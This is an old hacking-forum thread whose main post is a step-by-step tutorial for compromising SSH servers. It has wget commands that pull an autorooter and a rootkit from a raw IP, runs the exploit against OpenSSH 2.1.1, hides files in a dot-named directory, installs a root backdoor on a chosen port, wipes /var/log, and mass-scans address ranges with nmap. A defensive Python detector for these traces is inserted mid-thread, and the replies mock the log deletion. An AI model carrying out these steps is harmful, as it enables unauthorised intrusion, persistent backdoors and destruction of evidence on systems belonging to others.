prof
SSH Scanning and Hacking
First, we need some tools:
SecureCRT (https://secure.vandyke.com/vandyke-bin/download_form.cgi?PRODUCT=SecureCRT_beta)
An SSH client to connect to an SSH box. With this version you can SSH with a proxy.

LNX r00tkit (http://81.86.153.92/dd/lnx.gz)
A rootkit, the best there is I think. Very easy to use.
Only needed in the last step.

X6 (http://81.86.153.92/dd/x6.tgz)
The autorooter.

First, you have to have a scan with vulnerable IPs (or just one).
WATCH OUT FOR SSH-1.99 OPENSSH 2.1.1!! VERY VULNERABLE.
Almost always works for exploiting.

Let's say we got an IP, 0.0.0.0, and a shell.
Connect to your shell and type:
wget http://81.86.153.92/dd/x6.tgz
It downloads the autorooter to the shell.
When it's done, type: tar xzvf x6.tgz
Then type: cd x6

When in the dir, type: ./x6 -t#
It shows you all the exploitable SSH versions. Let's say we got an
exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list).
The IP = 0.0.0.0
You type:
./x6 -t123 0.0.0.0

Now it says something like: ATTACH NOW.
Wait 6 seconds, then push Enter. Normally it starts
exploiting; it says something like
1. 0x0000000 . . [SEGV]
2. 0x00000c4 . . [SURVIVED]
Something like that.

Just let it go and it will exploit your box.

If it doesn't go to 1. ..., and it says FATAL: no,
it's not vulnerable.

Then, when it has exploited the box, you get something like:
no crash been found
Rem from Remote : CHRIS CHRIS

*** YOU ARE IN ***
Boxname
Boxhost blahblah

Then type the following:
cd /usr/man/man3/
and then:
mkdir ". hiden"
and then:
cd "..."
This is a hidden dir so the sysop won't notice.

Now we are going to download the rootkit.
Type:
wget http://81.86.153.92/dd/lnx.gz
It will start downloading.
When done, type: tar xzvf lnx.gz
and then:
cd lnx

Then we are going to start it.
Let's say you want password "poop" on port 25374,
then you type:
./own poop 25374

It installs the rootkit, and done!! Connect to the IP
with port 25374 (or the one you too
Username = root
and you gave the password yourself.

Now CLEANING (for no traces):

rm -rf /var/logs/*

SSH scan TUTORIAL
Use nmap

http://www.insecure.org/nmap/nmap_download.html

Syntax for SSH scans:

nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT

-O means guess remote OS
-sS TCP SYN stealth
-p ports to scan (we include FTP, telnet, SSH, HTTP and secure HTTP)
and finally the nets '194.65.*.*': it will scan from 194.65.1.1
to 194.65.254.254.

Have phunz



Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES


Protecting your box from rehackers (IMPORTANT!!)

Before scanning or hacking I would recommend changing these vars.

It's very easy.

Works on all Linux versions.

Just make a shell script with vi:

#!/bin/sh
####
echo Protectin ur Env to a safe hax W0rk
echo LOL.dDwAx
####
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 1 > /proc/sys/net/ipv4/conf/default/hidden
echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/default/forwarding
echo 1 > /proc/sys/net/ipv4/conf/default/log_martians
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden
echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/eth0/log_martians
echo 1 > /proc/sys/net/ipv4/conf/eth0/rp_filter
####
echo Done
echo now use ur nmap or ur exploits and have phunz
####
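
As an added defensive example (not part of the original post), the script below checks a Linux host for the three traces the tutorial above leaves behind: oddly named directories under the manual tree, a listener on an unexpected port, and an emptied /var/log. The watched directory prefixes, the expected-port baseline and the sample listing are constructed assumptions, not values from the post.

```python
import re

# Names that are hard to spot in ls output: a run of three or more dots ("...")
# or a dot-name containing whitespace (". hiden"). Ordinary dotfiles are not flagged.
SUSPICIOUS_NAME = re.compile(r"^(\.{3,}|\.\S*\s.*)$")
# The post drops its files under the system manual tree (assumed locations).
WATCHED_PREFIXES = ("/usr/man/", "/usr/share/man/")
# Constructed baseline of listeners the host is expected to have.
EXPECTED_PORTS = {22, 25, 80, 443}
# Log files whose absence from /var/log suggests the directory was emptied.
CORE_LOGS = {"messages", "syslog", "wtmp", "auth.log"}


def suspicious_dirs(paths):
    """Return paths under the watched prefixes that contain a suspicious component."""
    hits = []
    for p in paths:
        for prefix in WATCHED_PREFIXES:
            if p.startswith(prefix):
                parts = p[len(prefix):].strip("/").split("/")
                if any(SUSPICIOUS_NAME.match(part) for part in parts):
                    hits.append(p)
                break
    return hits


def unexpected_listeners(listeners, expected=EXPECTED_PORTS):
    """Return (port, process) pairs whose port is not in the expected baseline."""
    return [(port, proc) for port, proc in listeners if port not in expected]


def logs_wiped(log_paths):
    """True when none of the core log files is present (e.g. after rm -rf /var/log/*)."""
    names = {p.rstrip("/").rsplit("/", 1)[-1] for p in log_paths}
    return not (names & CORE_LOGS)


def audit(paths, listeners, log_paths):
    """Combine the three checks into one findings dict."""
    return {"hidden_dirs": suspicious_dirs(paths),
            "listeners": unexpected_listeners(listeners),
            "logs_wiped": logs_wiped(log_paths)}


if __name__ == "__main__":
    # Constructed sample input mirroring the traces the post describes.
    sample_paths = ["/usr/man/man3/printf.3.gz", "/usr/man/man3/. hiden/",
                    "/usr/man/man3/.../lnx/own", "/usr/share/man/man1/.keep"]
    sample_listeners = [(22, "sshd"), (25374, "own")]
    print(audit(sample_paths, sample_listeners, []))
```

On a real host, feed audit() a listing from os.walk over the manual tree, the output of a socket-listing tool for listeners, and the contents of /var/log.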
Tyrano
I think someone might notice if all of the logs are gone.
M4Z3R
Thanks Teacher for this little tut, I'll maybe have a try on my local distro.
Stephen79
Also saw this exact same thing word for word here:

http://members.lycos.nl/leersumfxp/For%20A...H%20Hacking.txt

Not all the links are active there either.
Stephen79
Oh, and if you root it (step back) there are many more.

http://members.lycos.nl/leersumfxp/For%20A%20Board/
Blight
Deleting all /var/log would be a bit stupid, I think. Maybe only if you hope that the admin is blind.

Do you still find such old sshd versions?
Invision Power Board © 2001-2005 Invision Power Services, Inc.